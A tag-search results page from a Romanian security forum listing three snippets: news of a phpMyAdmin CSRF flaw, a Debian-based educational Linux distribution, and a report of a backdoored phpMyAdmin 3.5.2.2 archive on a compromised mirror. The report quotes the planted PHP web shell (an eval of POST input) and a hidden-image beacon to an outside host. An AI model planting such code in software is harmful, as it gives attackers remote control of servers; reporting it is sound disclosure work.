Jump to content

Search the Community

Showing results for tags 'phpmyadmin'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 3 results

  1. A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link. Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7). Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwant
  2. Edu * Ro este o distribuție Linux bazata pe Debian Jessie, construita special pentru activități didactice . Distributia construită pe scheletul subfamiliei Debian, conține o multitudine de programe cu licențe libere pentru învățământ, începând cu clasele primare și terminând cu învățământul universitar, precum și diverse programe utilitare cu licențe libere. Distributia contine un installer cu ajutorul căruia pot fi instalate cu un simplu click diverse aplicații specifice pentru matematică, fizică, chimie, geografie, biologie, statistică, electronică, radioamatori, grafică, birou, muzică,
  3. De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP: <?php @eval($_POST['c']); ?> De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate): var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.ap
×
×
  • Create New...